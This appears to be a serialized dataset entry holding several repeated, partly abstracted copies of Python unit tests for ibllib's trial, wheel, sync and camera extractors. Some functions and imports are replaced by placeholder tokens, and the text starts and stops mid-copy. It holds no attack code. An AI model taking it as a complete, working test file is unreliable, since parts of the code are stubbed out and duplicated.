self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n <function token>\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = 